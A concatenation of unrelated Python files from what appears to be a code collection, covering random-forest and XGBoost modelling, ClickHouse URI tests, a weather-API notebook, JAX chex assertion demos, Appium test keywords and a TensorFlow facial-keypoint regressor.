22,424 | ff00171c8bddc3195884a9cf097a0639d383c266 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import RandomizedSearchCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
from sklearn.inspection import permutation_importance
from sklearn.inspection import plot_partial_dependence
from sklearn.tree import plot_tree
from sklearn import tree
from xgboost import XGBClassifier
def default_random_forest(features, df):
    """Fit an out-of-the-box random forest and report in-sample metrics.

    Args:
        features - list of chosen features to include
        df - dataframe
    Returns:
        Classification report with accuracy, precision and recall scores
        (evaluated on the training data itself).
    """
    X = features
    y = df['Severity'].values
    model = RandomForestClassifier(n_estimators=100)
    model.fit(X, y)
    predictions = model.predict(X)
    return classification_report(y, predictions, target_names=['Non-Severe', 'Severe'])
def random_forest_grid(features, df, param_dict):
    """Randomised CV search over random-forest hyperparameters.

    Args:
        features - list of chosen features to include
        df - DataFrame
        param_dict - parameter grid to sample from during fitting
    Returns:
        Best f1 score and the corresponding hyperparameters
    """
    X = features
    y = df['Severity'].values
    search = RandomizedSearchCV(
        estimator=RandomForestClassifier(),
        param_distributions=param_dict,
        n_iter=70,
        cv=5,
        scoring='f1',
        verbose=2,
        random_state=42,
        n_jobs=-1,
    )
    fitted = search.fit(X, y)
    return fitted.best_score_, fitted.best_params_
def feature_importance(features, df):
    """Feature Importances of Random Forest Model
    Args:
        features - list of chosen features to include
        df - dataframe
    Returns:
        feature importance plot
    """
    feature_name = features.columns.values
    X= features
    y = df['Severity'].values
    model = RandomForestClassifier(n_estimators = 300, max_features='sqrt', max_depth=60, random_state=42,
                               min_samples_leaf = 2, bootstrap = True, min_samples_split=5)
    model.fit(X, y)
    # permutation importance: mean f1 drop when each feature is shuffled
    results = permutation_importance(model, X, y, scoring='f1')
    importance = results.importances_mean
    std = results.importances_std
    # top 20 features, most important first
    indices = np.argsort(importance)[::-1][:20]
    plt.figure(figsize=(12,12))
    plt.title("Feature importances")
    # error bars show the std of the permutation-importance estimates
    plt.bar(range(len(indices)), importance[indices], color="r", yerr=std[indices], align="center")
    plt.xticks(range(len(indices)), feature_name[indices], rotation='vertical')
    plt.xlim([-1, len(indices)])
    plt.show()
def partial_dependence(features, df, feat):
    """Partial Dependence of Random Forest Model
    Args:
        features - list of chosen features to include
        df - dataframe
        feat - feature(s) to input for dependence
    Returns:
        Partial dependence plot
    """
    plt.rcParams['figure.figsize'] = 16, 9
    X= features
    y = df['Severity'].values
    model = RandomForestClassifier(n_estimators = 300, max_features='sqrt', max_depth=60, random_state=42,
                               min_samples_leaf = 2, bootstrap = True, min_samples_split=5)
    model.fit(X, y)
    # NOTE(review): plot_partial_dependence was removed in newer sklearn in
    # favour of PartialDependenceDisplay.from_estimator — confirm the pinned
    # sklearn version before upgrading.
    plot_partial_dependence(model, X, feat, line_kw={"c": "m"})
    plt.show()
def decision_tree(features, df):
    """Plot Decision Tree
    Args:
        features - list of chosen features to include
        df - dataframe
    Returns:
        decision tree
    """
    X= features
    y = df['Severity']
    # shallow depth (4) keeps the rendered tree legible
    clf = DecisionTreeClassifier(min_samples_split=6, min_samples_leaf=2, max_depth=4,
                             criterion = 'gini', random_state=42)
    clf.fit(X, y)
    plt.figure(figsize=(25,10))
    # render the fitted tree with the original feature names
    a = tree.plot_tree(clf,
                   feature_names=X.columns.to_list(),
                   filled=True,
                   rounded=True,
                   fontsize=14)
    plt.show()
def xgboost_model(features, df):
    """Fit a tuned eXtreme Gradient Boosting model; report in-sample metrics.

    Args:
        features - list of chosen features to include
        df - dataframe
    Returns:
        Classification report with accuracy, precision and recall scores
    """
    X = features
    y = df['Severity'].values
    booster = XGBClassifier(subsample=.7, reg_lambda=5, n_estimators=900, min_child_weight=1, max_depth=20,
                            learning_rate=.01, gamma=.5, colsample_bytree=.6, colsample_bylevel=.7)
    booster.fit(X, y)
    predictions = booster.predict(X)
    return classification_report(y, predictions, target_names=['Non-Severe', 'Severe'])
if __name__ == '__main__':
    # Read csv file into a pandas dataframe
    df = pd.read_csv('../data/nonlinear_data.csv')
    # Features to input in model
    full_features = df[['Temperature(F)', 'Humidity(%)', 'Pressure(in)', 'Visibility(mi)',
       'Wind_Speed(mph)', 'Precipitation(in)', 'Bump', 'Crossing', 'Junction',
       'Railway', 'Traffic_Signal', 'Civil_Twilight', 'Rush Hour', 'Weekend',
       'Weather_Condition_Clear', 'Weather_Condition_Cloudy',
       'Weather_Condition_Fog', 'Weather_Condition_Other',
       'Weather_Condition_Rain', 'Weather_Condition_Snow',
       'Weather_Condition_Thunderstorm', 'Season_Fall', 'Season_Spring',
       'Season_Summer', 'Season_Winter', 'Region_Midwest', 'Region_Northeast',
       'Region_Pacific', 'Region_Rockies', 'Region_Southeast',
       'Region_Southwest', 'Side_R']]
    # NOTE(review): the classification reports / scores returned by the calls
    # below are discarded — print() them to actually see the results.
    default_random_forest(full_features, df)
    # Define a grid of hyperparameter ranges and randomly sample from the grid
    # (a 5% sample keeps the randomized search tractable)
    small_df = df.sample(frac =.05)
    reduced_features = small_df[['Temperature(F)', 'Humidity(%)',
       'Pressure(in)', 'Visibility(mi)', 'Wind_Speed(mph)',
       'Precipitation(in)',
       'Junction',
       'Traffic_Signal', 'Civil_Twilight', 'Rush Hour', 'Weekend', 'Region_Midwest',
       'Region_Northeast', 'Region_Pacific', 'Region_Rockies',
       'Region_Southwest', 'Side_R', 'Season_Spring', 'Season_Summer',
       'Season_Winter', 'Weather_Condition_Clear', 'Weather_Condition_Fog',
       'Weather_Condition_Other', 'Weather_Condition_Rain',
       'Weather_Condition_Snow', 'Weather_Condition_Thunderstorm']]
    n_estimators = [50, 100, 200, 400, 500, 700]
    max_features = ['auto', 'sqrt']
    max_depth = [int(x) for x in np.linspace(10, 110, num = 11)]
    max_depth.append(None)
    min_samples_split = [2, 5, 10]
    min_samples_leaf = [1, 2, 4]
    bootstrap = [True, False]
    param_grid = {'n_estimators': n_estimators,
               'max_features': max_features,
               'max_depth': max_depth,
               'min_samples_split': min_samples_split,
               'min_samples_leaf': min_samples_leaf,
               'bootstrap': bootstrap}
    random_forest_grid(reduced_features, small_df, param_grid)
    # Display Feature Importance
    feature_importance(reduced_features, small_df)
    # Display Partial Dependence Plot
    partial_dependence(reduced_features, small_df, feat=['Temperature(F)', 'Humidity(%)', 'Pressure(in)'])
    # Display Decision Tree
    decision_tree(full_features, df)
    # Display Classification Report for XGBoost
    xgboost_model(full_features, df)
|
22,425 | 810ce3db0ef6eba7075d24633ece6399d6710428 | from datahub.ingestion.source.sql.clickhouse import ClickHouseConfig
def test_clickhouse_uri_https():
    """protocol=https passed via uri_opts must land in the URL query string."""
    settings = {
        "username": "user",
        "password": "password",
        "host_port": "host:1111",
        "database": "db",
        "uri_opts": {"protocol": "https"},
    }
    url = ClickHouseConfig.parse_obj(settings).get_sql_alchemy_url()
    assert url == "clickhouse://user:password@host:1111/db?protocol=https"
def test_clickhouse_uri_native():
    """Native scheme with no database yields a trailing-slash URL."""
    settings = {
        "username": "user",
        "password": "password",
        "host_port": "host:1111",
        "scheme": "clickhouse+native",
    }
    url = ClickHouseConfig.parse_obj(settings).get_sql_alchemy_url()
    assert url == "clickhouse+native://user:password@host:1111/"
def test_clickhouse_uri_native_secure():
    """secure=True via uri_opts appears in the query of a native-scheme URL."""
    settings = {
        "username": "user",
        "password": "password",
        "host_port": "host:1111",
        "database": "db",
        "scheme": "clickhouse+native",
        "uri_opts": {"secure": True},
    }
    url = ClickHouseConfig.parse_obj(settings).get_sql_alchemy_url()
    assert url == "clickhouse+native://user:password@host:1111/db?secure=True"
def test_clickhouse_uri_default_password():
    """Omitting the password produces a URL without the ':password' part."""
    settings = {
        "username": "user",
        "host_port": "host:1111",
        "database": "db",
        "scheme": "clickhouse+native",
    }
    url = ClickHouseConfig.parse_obj(settings).get_sql_alchemy_url()
    assert url == "clickhouse+native://user@host:1111/db"
def test_clickhouse_uri_native_secure_backward_compatibility():
    """Legacy top-level 'secure' flag still maps into the query string."""
    settings = {
        "username": "user",
        "password": "password",
        "host_port": "host:1111",
        "database": "db",
        "scheme": "clickhouse+native",
        "secure": True,
    }
    url = ClickHouseConfig.parse_obj(settings).get_sql_alchemy_url()
    assert url == "clickhouse+native://user:password@host:1111/db?secure=True"
def test_clickhouse_uri_https_backward_compatibility():
    """Legacy top-level 'protocol' field still maps into the query string."""
    settings = {
        "username": "user",
        "password": "password",
        "host_port": "host:1111",
        "database": "db",
        "protocol": "https",
    }
    url = ClickHouseConfig.parse_obj(settings).get_sql_alchemy_url()
    assert url == "clickhouse://user:password@host:1111/db?protocol=https"
|
22,426 | 204a799db9fc38d93ecc3d67aab460cd83835d50 | #!/usr/bin/env python
# coding: utf-8
# # WeatherPy
# ----
#
# ### Analysis
# * As expected, the weather becomes significantly warmer as one approaches the equator (0 Deg. Latitude). More interestingly, however, is the fact that the southern hemisphere tends to be warmer this time of year than the northern hemisphere. This may be due to the tilt of the earth.
# * There is no strong relationship between latitude and cloudiness. However, it is interesting to see that a strong band of cities sits at 0, 80, and 100% cloudiness.
# * There is no strong relationship between latitude and wind speed. However, in northern hemispheres there is a flurry of cities with over 20 mph of wind.
#
# ---
#
# #### Note
# * Instructions have been included for each segment. You do not have to follow them exactly, but they are included to help you think through the steps.
# In[1]:
# Dependencies and Setup
import pandas as pd
import numpy as np
import requests
import datetime
import matplotlib.pyplot as plt
from pandas.io.json import json_normalize
import seaborn as sns; sns.set() # trying a new package called seaborn to generate plots
# Import API key
from config import api_key
# Incorporated citipy to determine city based on latitude and longitude
from citipy import citipy
# Output File (CSV)
output_data_file = "output_data/cities.csv"
# Range of latitudes and longitudes
# NOTE(review): lat_range/lng_range appear unused — the random sampling
# further down uses hard-coded bounds; confirm before removing.
lat_range = (-90, 90)
lng_range = (-180, 180)
# Today's time (formatted for plot titles)
now = datetime.datetime.now()
todayDate = now.strftime("%m/%d/%Y")
# ## Generate Cities List
# In[2]:
# List for holding lat_lngs and cities
lat_lngs = []
cities = []
# Create a set of random lat and lng combinations
lats = np.random.uniform(low=-90.000, high=90.000, size=1500)
lngs = np.random.uniform(low=-180.000, high=180.000, size=1500)
lat_lngs = zip(lats, lngs)
# Identify nearest city for each lat, lng combination
for lat_lng in lat_lngs:
    city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name
    # If the city is unique, then add it to a our cities list
    # (many random coordinates map to the same nearest city)
    if city not in cities:
        cities.append(city)
# Print the city count to confirm sufficient count
# (bare expression: a notebook display artifact, no effect as a script)
len(cities)
# ### Perform API Calls
# * Perform a weather check on each city using a series of successive API calls.
# * Include a print log of each city as it'sbeing processed (with the city number and city name).
#
# In[3]:
# base URL for open weather API
baseURL = "http://api.openweathermap.org/data/2.5/weather?"
# df is the base dataframe with api responses
# json_normalize() flattens each JSON response into one dataframe row
df = pd.DataFrame()
x = 1  # running record number: counts successful lookups only
print('Beginning Data Retrieval')
print('-' * 38)
for city in cities:
    queryUrl = baseURL + 'appid=' + api_key + '&q=' + city + '&units=imperial'
    try:
        response = requests.get(queryUrl).json()
        if response['cod'] == 200:
            print(f"Processing Record data for {x} of Set 1 | {city}")
            df = df.append(json_normalize(response), sort=True)
            x = x + 1
        # Bug fix: failed lookups previously decremented x, making the next
        # successful record reuse an earlier number; skipping the city
        # without touching the counter keeps the log numbering monotonic.
    except Exception:
        # network / JSON errors: skip this city and keep going
        pass
# In[4]:
## check api response data, occasionally, you get humidity reading above 100%
## these are bad data that may skew the plot, so they need to be dropped
# (bare expressions below are notebook display artifacts; no effect as a script)
df.loc[df['main.humidity'] > 100]
# In[5]:
# show all the column heads of the raw dataframe
list(df)
# In[6]:
# take a look at the columns and raw dataset - there are some odd columns and missing values
df.count()
# In[7]:
# drop humidity > 100% rows, check data integrity
df = df.rename(columns={'main.humidity' : 'humidity'})
df = df[df.humidity <= 100]
df.count()
# ### Convert Raw Data to DataFrame
# * Export the city data into a .csv.
# * Display the DataFrame
# In[8]:
# df1 is modified dataframe with relevent data for final reports
# (renames the flattened API columns to human-friendly names)
df1 = pd.DataFrame()
df1['City'] = df['name']
df1['Cloudiness'] = df['clouds.all']
df1['Country'] = df['sys.country']
df1['Humidity'] = df['humidity']
df1['Date'] = df['dt']
df1['Latitude'] = df['coord.lat']
df1['Longitude'] = df['coord.lon']
df1['Max Temp'] = df['main.temp_max']
df1['Wind Speed'] = df['wind.speed']
# export results to output csv file
df1.to_csv(output_data_file)
# display dataframe
df1.head()
# In[9]:
# check data integrity - should have same number each columns
df1.count()
# ### Plotting the Data
# * Use proper labeling of the plots using plot titles (including date of analysis) and axes labels.
# * Save the plotted figures as .pngs.
# #### Latitude vs. Temperature Plot
# In[10]:
# Scatter plots of each weather variable against latitude, one per section.
# plotting Lat vs Temp
x = df1['Latitude']
y = df1['Max Temp']
tempPlot = sns.set_style("whitegrid")
tempPlot = sns.scatterplot(x, y, data=df1)
# Bug fix: axis label previously misspelled 'Tempreture'.
tempPlot.set(xlabel='Latitude', ylabel='Max Temperature (F)')
plt.title(f'City Latitude vs Max Temperature ({todayDate})')
plt.show()
# #### Latitude vs. Humidity Plot
# In[11]:
x = df1['Latitude']
y = df1['Humidity']
tempPlot = sns.set_style("whitegrid")
# Bug fix: title previously read just 'City Latitude', omitting the metric.
plt.title(f'City Latitude vs Humidity ({todayDate})')
tempPlot = sns.scatterplot(x, y, data=df1,)
tempPlot.set(xlabel='Latitude', ylabel='Humidity (%)')
plt.show()
# #### Latitude vs. Cloudiness Plot
# In[12]:
x = df1['Latitude']
y = df1['Cloudiness']
tempPlot = sns.set_style("whitegrid")
tempPlot = sns.scatterplot(x, y, data=df1)
tempPlot.set(xlabel='Latitude', ylabel='Cloudiness (%)')
plt.title(f'City Latitude vs Cloudiness ({todayDate})')
plt.show()
# #### Latitude vs. Wind Speed Plot
# In[13]:
x = df1['Latitude']
y = df1['Wind Speed']
tempPlot = sns.set_style("whitegrid")
tempPlot = sns.scatterplot(x, y, data=df1)
tempPlot.set(xlabel='Latitude', ylabel='Wind Speed (mph)')
# Consistency fix: match the 'City Latitude vs ...' title style of the others.
plt.title(f'City Latitude vs Wind Speed ({todayDate})')
plt.show()
|
22,427 | 74832156a0f6e19a730427d3db04eaf3f0d8a5aa | import chex
import jax
import jax.numpy as jnp
from chex import assert_shape, assert_rank, assert_type, assert_equal_shape, assert_tree_all_close, assert_tree_all_finite, assert_numerical_grads, assert_devices_available, assert_tpu_available
from absl.testing import parameterized
def asserts(t1, t2, t3, t4, t5, x, y, z, tree_x, tree_y, f, j):
    """Demo of the chex assertion API: shape, rank, type, tree and device checks."""
    # ensure that t1, t2, t3 are shaped the same
    chex.assert_equal_shape([t1, t2, t3])
    # assert that t4, t5 have the rank 2 and (3 or 4)
    chex.assert_rank([t4, t5], [2, {3, 4}])
    assert_shape(x, (2, 3))  # x has shape (2, 3)
    assert_shape([x, y], [(), (2, 3)])  # x is scalar and y has shape (2, 3)
    assert_rank(x, 0)  # x is a scalar
    assert_rank([x, y], [0, 2])  # assert x is scalar and y is rank-2 array
    assert_rank([x, y], {0, 2})  # assert x and y are either scalar or rank-2 arrays
    assert_type(x, int)  # x has type int
    assert_type([x, y], [int, float])  # x has type 'int' and y has type 'float'
    assert_equal_shape([x, y, z])  # assert equal shape
    assert_tree_all_close(tree_x, tree_y)  # values and tree structures match
    assert_tree_all_finite(tree_x)  # all tree_x leaves are finite
    assert_devices_available(2, 'gpu')  # 2 GPUs available
    assert_tpu_available()  # at least 1 TPU available
    assert_numerical_grads(f, (x, y), j)  # f^{(j)} (x, y) matches numerical grads.
# make sure that jax.jit is not retracing more than n times.
def retracing():
@jax.jit
@chex.assert_max_traces(n=1)
def fn_sum_jitted(x, y):
return x + y
z = fn_sum_jitted(jnp.zeros(3), jnp.zeros(3))
t = fn_sum_jitted(jnp.zeros(6,7), jnp.zeros(6, 7)) # assertion error
def fn_sub(x, y):
return x - y
# can be used with jax.pmap
fn_sub_pmapped = jax.pmap(chex.assert_max_retraces(fn_sub), n = 10)
### Test Variants with and without jax
def fn(x, y):
    """Toy addition used by the chex variant tests below."""
    return x + y
class ExampleTest(chex.TestCase):
    """chex variant demo: the same test body runs with and without jax.jit."""

    @chex.variants(with_jit=True, without_jit=True)
    def test(self):
        var_fn = self.variant(fn)
        # OR: the variant can be applied as a decorator (this rebinds var_fn).
        @self.variant
        def var_fn(x, y):
            return x + y
        self.assertEqual(fn(1, 2), 3)
        self.assertEqual(var_fn(1, 2), fn(1, 2))
## Parameterized Testing
class ExampleParameterizedTest(parameterized.TestCase):
    """Combines chex variants with absl's parameterized named test cases."""

    @chex.variants(with_jit=True, without_jit=True)
    @parameterized.named_parameters(
        ('case_positive', 1, 2, 3),
        ('case_negative', -1, -2, -3)
    )
    def test(self, arg_1, arg_2, expected):
        @self.variant
        def var_fn(x, y):
            return x + y
        self.assertEqual(var_fn(arg_1, arg_2), expected)
## Fake jit and pmapping.
def fake_pmap(inputs):
    """Run a pmapped function under chex.fake_pmap, which turns pmap into vmap."""
    with chex.fake_pmap():
        @jax.pmap
        def fn(inputs):
            #...
            return True
        # function will be vmapped over inputs.
        fn(inputs)

# this also works
# Bug fix: the context manager is chex.fake_pmap(); chex.fake_map() does not exist.
fake_pmap2 = chex.fake_pmap()
fake_pmap2.start()
# insert code here
fake_pmap2.stop()
# faking set up of multi-device test environments
def setUpModule():
    # Fake a multi-CPU-device environment before any jax backend initialises.
    chex.set_n_cpu_devices()
22,428 | 896a01af563e266b22915b4ddafd164506f1aaa2 | # coding:utf8
from appium import webdriver
from cfg import desired_caps
class MobileOp:
    """Robot Framework keyword library driving the app through one shared Appium session."""
    ROBOT_LIBRARY_SCOPE = 'GLOBAL'
    # Session is shared across keyword calls via the class attribute.
    shared_wd = None

    def createSession(self):
        """Open the Appium session and set a 10 s implicit wait."""
        MobileOp.shared_wd = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
        MobileOp.shared_wd.implicitly_wait(10)

    def closeSession(self):
        """Quit the shared Appium session."""
        MobileOp.shared_wd.quit()

    def openFirstArticle(self):
        """Tap the first article title in the list and return its text."""
        code = u'new UiSelector().resourceId("io.manong.developerdaily:id/tv_title").instance(0)'
        ele1 = MobileOp.shared_wd.find_element_by_android_uiautomator(code)
        text1 = ele1.text
        # Bug fix: parenthesised print so the module also parses under Python 3
        # (the original used the Python-2-only print statement).
        print(text1)
        ele1.click()
        return text1

    def getOpenedArticleTitle(self):
        """Return the title text of the currently opened article."""
        ele2 = MobileOp.shared_wd.find_element_by_id('io.manong.developerdaily:id/tv_title')
        return ele2.text

    # key is : back, home
    def pressKey(self, key):
        """Send the Android keycode for 'back' (4) or 'home' (3)."""
        keycodes = {'back': 4, 'home': 3}
        if key not in keycodes:
            # Previously an unknown key silently sent press_keycode(None).
            raise ValueError('unsupported key: %s' % key)
        MobileOp.shared_wd.press_keycode(keycodes[key])

    def isInMainActivity(self):
        """True when the main activity's '+' tab-bar button is present."""
        eles = MobileOp.shared_wd.find_elements_by_id('io.manong.developerdaily:id/tab_bar_plus')
        return bool(eles)
22,429 | 60d6208ef1c30ab58ba1022c6154a8f1905d64d3 | """
Get the arithmetic mean of numbers
----------------------------------
Input: (list) numbers
Output: (float) arithmetic mean of numbers
"""
# fmean() is faster, than mean() and always returns with float
# Python 3.8 is required
from statistics import fmean
numbers = [20, 5, 0, -5, -10]
mean_1 = fmean(numbers)
print('original numbers: {}\nmean: {}'.format(numbers, mean_1))
numbers_2 = [20.0, 5.0, 0, -5.0, -10]
mean_2 = fmean(numbers_2)
print('\noriginal numbers: {}\nmean: {}'.format(numbers_2, mean_2))
numbers_3 = [10, 10, 10]
mean_3 = fmean(numbers_3)
print('\noriginal numbers: {}\nmean: {}'.format(numbers_3, mean_3))
|
22,430 | 96a69961c66784c04ef832f1f2226115c68fdce8 | from os import system
system("clear")
#pilas
ls = [12,13,14,15,16]
print(ls)
s = ls.pop()
print("*"*25)
print(s)
print(ls)
print("*"*25)
#colas
ls = [12,13,14,15,16]
print(ls)
s = ls.pop(0)
print(s)
print(ls)
ls.pop(0)
ls.pop(0)
ls.pop(0)
print(ls) |
22,431 | 3db1abf895e2f3b9a8168cf4b5a75432d9cc101e | from alcloud.third_party.pytorch_3d_cnn.ext_fea import *
from alcloud.config import TEST_RES_DIR
import os
# Smoke test: build the 3D-ResNeXt feature extractor, then run it on the
# bundled sample video frames and print the resulting feature.
model, opt = init_3d_resnext_feature_extractor()
print(model, opt)
print(extract_video_feature_from_frames(os.path.join(TEST_RES_DIR, 'video', 'video_frames'), model, opt))
|
22,432 | 20ff76bcb9a5d9694e230f3b086a7156dcd3bc76 | from __future__ import print_function
import pandas as pd
import numpy as np
import tensorflow as tf
import time
import csv
# === CONSTANTS ===
# File locations for the Kaggle facial-keypoints data and outputs.
data_path = "../data/"
results_path = "../results/"
train_path = data_path + "training.csv"
test_path = data_path + "test.csv"
IdLookupTable_path = results_path + "IdLookupTable.csv"
output_file_path = results_path + "submission.csv"
# Fraction of the training rows held out for validation.
validation_proportion = 0.1
# The 30 target columns (x/y for 15 facial keypoints), in dataset column order.
keypoint_names = ["left_eye_center_x","left_eye_center_y","right_eye_center_x","right_eye_center_y","left_eye_inner_corner_x","left_eye_inner_corner_y","left_eye_outer_corner_x","left_eye_outer_corner_y","right_eye_inner_corner_x","right_eye_inner_corner_y","right_eye_outer_corner_x","right_eye_outer_corner_y","left_eyebrow_inner_end_x","left_eyebrow_inner_end_y","left_eyebrow_outer_end_x","left_eyebrow_outer_end_y","right_eyebrow_inner_end_x","right_eyebrow_inner_end_y","right_eyebrow_outer_end_x","right_eyebrow_outer_end_y","nose_tip_x","nose_tip_y","mouth_left_corner_x","mouth_left_corner_y","mouth_right_corner_x","mouth_right_corner_y","mouth_center_top_lip_x","mouth_center_top_lip_y","mouth_center_bottom_lip_x","mouth_center_bottom_lip_y"]
# keypoint column name -> index into the 30-element prediction vector.
keypoint_indices = dict((keypoint_name, index) for index, keypoint_name in enumerate(keypoint_names))
# Images are 96x96 greyscale with pixel values in [0, 255].
image_size = 96
num_keypoints = 15
max_pixel_value = 255
# Network dimensions and training hyper-parameters.
input_size = image_size*image_size
num_hidden = 100
output_size = 2*num_keypoints
learning_rate = 1e-3
dropout_keep_prob = 0.5
num_epochs = 200
batch_size = 100
display_step = 10
plot = True
generate_results = True
# Keypoint index pairs that swap when an image is mirrored horizontally.
flip_indices = [(0, 2), (1, 3), (4, 8), (5, 9), (6, 10), (7, 11), (12, 16), (13, 17), (14, 18), (15, 19), (22, 24), (23, 25)]
# === GET DATA ===
def get_data_set(path, train=True):
    """Load a CSV of face images (and keypoints when train=True).

    Returns (X, Y): X holds one flattened, normalised image per row;
    Y holds the keypoint matrix scaled to roughly [-1, 1], or None when
    loading the unlabeled test set.
    """
    frame = pd.read_csv(path).dropna()
    # Each 'Image' cell is a space-separated pixel string -> 1-D float array.
    frame['Image'] = frame['Image'].apply(lambda image: np.fromstring(image, sep=' '))
    X = np.vstack(frame['Image'].values) / (float(max_pixel_value) / 2)
    if not train:
        return X, None
    # All columns except the trailing 'Image' column are keypoint coordinates.
    Y = (frame[frame.columns[:-1]].values - image_size / 2) / (float(image_size) / 2)
    # Shuffle images and targets with the same permutation.
    order = np.random.permutation(len(X))
    return X[order], Y[order]
print("Constructing training set...")
train_X, train_Y = get_data_set(train_path, train=True)
valid_index = int(len(train_X) * validation_proportion)
valid_X = train_X[:valid_index]
train_X = train_X[valid_index:]
valid_Y = train_Y[:valid_index]
train_Y = train_Y[valid_index:]
print("Constructing test set...")
test_X, _ = get_data_set(test_path, train=False)
print("\nTrain X")
print(train_X.shape)
print("train_X[0]:",train_X[0])
print("\nTrain Y")
print(train_Y.shape)
print("train_Y[0]:",train_Y[0])
print("\nValid X")
print(valid_X.shape)
print("valid_X[0]:",valid_X[0])
print("\nValid Y")
print(valid_Y.shape)
print("valid_Y[0]:",valid_Y[0])
print("\nTest X")
print(test_X.shape)
print("test_X[0]:",test_X[0])
# === MODEL ===
def new_weights(shape, xavier=True):
    """Create a weight Variable; stddev 1/fan_in for 2-D shapes when xavier=True."""
    dev = 1.0
    if xavier and len(shape) == 2:
        # Bug fix: use true division. Under Python 2, 1/shape[0] was integer
        # division and evaluated to 0 for any fan-in > 1, giving stddev 0.
        dev = 1.0 / shape[0]
    initial = tf.random_normal(shape, stddev=dev)
    return tf.Variable(initial)
def new_biases(shape, xavier=True):
    """Create a bias Variable; stddev 1/fan_in for 2-D shapes when xavier=True."""
    dev = 1.0
    if xavier and len(shape) == 2:
        # Bug fix: true division (1/shape[0] was integer division under Python 2).
        dev = 1.0 / shape[0]
    initial = tf.random_normal(shape, stddev=dev)
    return tf.Variable(initial)
def simple_linear_layer(input, shape):
    """Affine layer: input @ W + b, with W of the given [n_in, n_out] shape."""
    assert (len(shape) == 2), "Shape : [input,output]"
    weights = new_weights(shape)
    biases = new_biases([shape[-1]])
    return tf.matmul(input, weights) + biases
def simple_relu_layer(input, shape, dropout_keep_prob=None):
    """Affine layer followed by ReLU, with optional dropout when a
    keep-probability is supplied."""
    logits = simple_linear_layer(input, shape)
    logits = tf.nn.relu(logits)
    # Idiom fix: `x is not None` instead of `not x is None`.
    if dropout_keep_prob is not None:
        logits = tf.nn.dropout(logits, dropout_keep_prob)
    return logits
def one_hidden_layer_model(input, dropout_keep_prob=None):
    """96x96 pixel vector -> hidden ReLU layer -> 30 keypoint coordinates.

    Bug fix: the dropout_keep_prob parameter was silently ignored and the
    module-level `keep_prob` placeholder used instead. The parameter is now
    honoured; the only call site passes keep_prob, so behaviour is unchanged.
    """
    with tf.name_scope('hidden_layer'):
        hidden_logits = simple_relu_layer(
            input, [input_size, num_hidden], dropout_keep_prob=dropout_keep_prob)
    with tf.name_scope('output_layer'):
        output_logits = simple_linear_layer(hidden_logits, [num_hidden, output_size])
    return output_logits
print ("\nConstructing model...")
with tf.name_scope('placeholders'):
pixels = tf.placeholder(tf.float32, shape=[None, input_size])
keypoints = tf.placeholder(tf.float32, shape=[None, output_size])
keep_prob = tf.placeholder(tf.float32)
with tf.name_scope('model'):
predicted_keypoints = one_hidden_layer_model(pixels,dropout_keep_prob=keep_prob)
with tf.name_scope('loss'):
loss = tf.sqrt(tf.reduce_mean(tf.square(predicted_keypoints - keypoints)))
with tf.name_scope('Train_step'):
train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss)
init = tf.initialize_all_variables()
# === TRAINING MODEL ===
def seconds2minutes(time):
    """Split a duration in seconds into whole (minutes, seconds)."""
    return divmod(int(time), 60)
with tf.Session() as session:
    session.run(init)
    num_examples = len(train_X)
    num_steps_per_epoch = num_examples//batch_size
    absolute_step = 0
    # Loss-curve history consumed by the plotting section below.
    steps = []
    train_losses = []
    valid_losses = []
    print("\nSTART TRAINING (", num_epochs, "epochs,", num_steps_per_epoch, "steps per epoch )")
    begin_time = time_0 = time.time()
    for epoch in range(num_epochs):
        print("*** EPOCH", epoch, "***")
        for step in range(num_steps_per_epoch):
            # Mini-batch slice for this step.
            batch_X = train_X[step * batch_size:(step + 1) * batch_size]
            batch_Y = train_Y[step * batch_size:(step + 1) * batch_size]
            _ = session.run(train_step, feed_dict={pixels: batch_X, keypoints: batch_Y, keep_prob: dropout_keep_prob})
            absolute_step += 1
            if step % display_step == 0:
                # Evaluate losses with dropout disabled (keep_prob = 1.0).
                train_loss = session.run(loss, feed_dict={pixels: batch_X, keypoints: batch_Y, keep_prob: 1.0})
                valid_loss = session.run(loss, feed_dict={pixels: valid_X, keypoints: valid_Y, keep_prob: 1.0})
                print("Batch Loss =", train_loss, "at step", absolute_step)
                print("Validation Loss =", valid_loss, "at step", absolute_step)
                # De-normalised loss, comparable to the competition score.
                print("Estimated Score =", valid_loss*image_size/2, "at step", absolute_step)
                steps.append(absolute_step)
                train_losses.append(train_loss)
                valid_losses.append(valid_loss)
                # Time spent is measured
                if absolute_step > 0:
                    t = time.time()
                    d = t - time_0
                    time_0 = t
                    print("Time:", d, "s to compute", display_step, "steps")
        # NOTE(review): this slice is always empty — num_examples * batch_size
        # is far past the end of train_X. `num_steps_per_epoch * batch_size`
        # was presumably intended to train on the leftover examples; confirm
        # before changing (an empty batch may also yield NaN gradients).
        last_batch_X = train_X[num_examples * batch_size:]
        last_batch_Y = train_Y[num_examples * batch_size:]
        _ = session.run(train_step, feed_dict={pixels: last_batch_X, keypoints: last_batch_Y, keep_prob: dropout_keep_prob})
        absolute_step += 1
    total_time = time.time() - begin_time
    total_time_minutes, total_time_seconds = seconds2minutes(total_time)
    print("*** Total time to compute", num_epochs, "epochs:", total_time_minutes, "minutes and", total_time_seconds, "seconds (", total_time, "s)***")
    # === TEST ===
    # Predict test-set keypoints batch by batch, then de-normalise to pixels.
    test_predictions = []
    num_test_steps = len(test_X)//batch_size
    print('\n*** Start testing (', num_test_steps, 'steps ) ***')
    for step in range(num_test_steps):
        batch_X = test_X[step * batch_size:(step + 1) * batch_size]
        pred = session.run(predicted_keypoints, feed_dict={pixels : batch_X, keep_prob: 1.0})
        test_predictions.extend(pred)
    last_batch_X = test_X[num_test_steps * batch_size:]
    pred = session.run(predicted_keypoints, feed_dict={pixels : last_batch_X, keep_prob: 1.0})
    test_predictions.extend(pred)
    test_predictions = np.array(test_predictions)
    # Map predictions from [-1, 1] back to pixel coordinates.
    test_predictions = test_predictions * image_size/2 + image_size/2
    print('Test prediction', test_predictions.shape)
# === PLOTTING ===
if plot:
    print("Plotting...")
    import matplotlib.pyplot as plt
    # Red dots: batch loss; blue squares: validation loss, both per logged step.
    plt.plot(steps, train_losses, 'ro', steps, valid_losses, 'bs')
    x1, x2, y1, y2 = plt.axis()
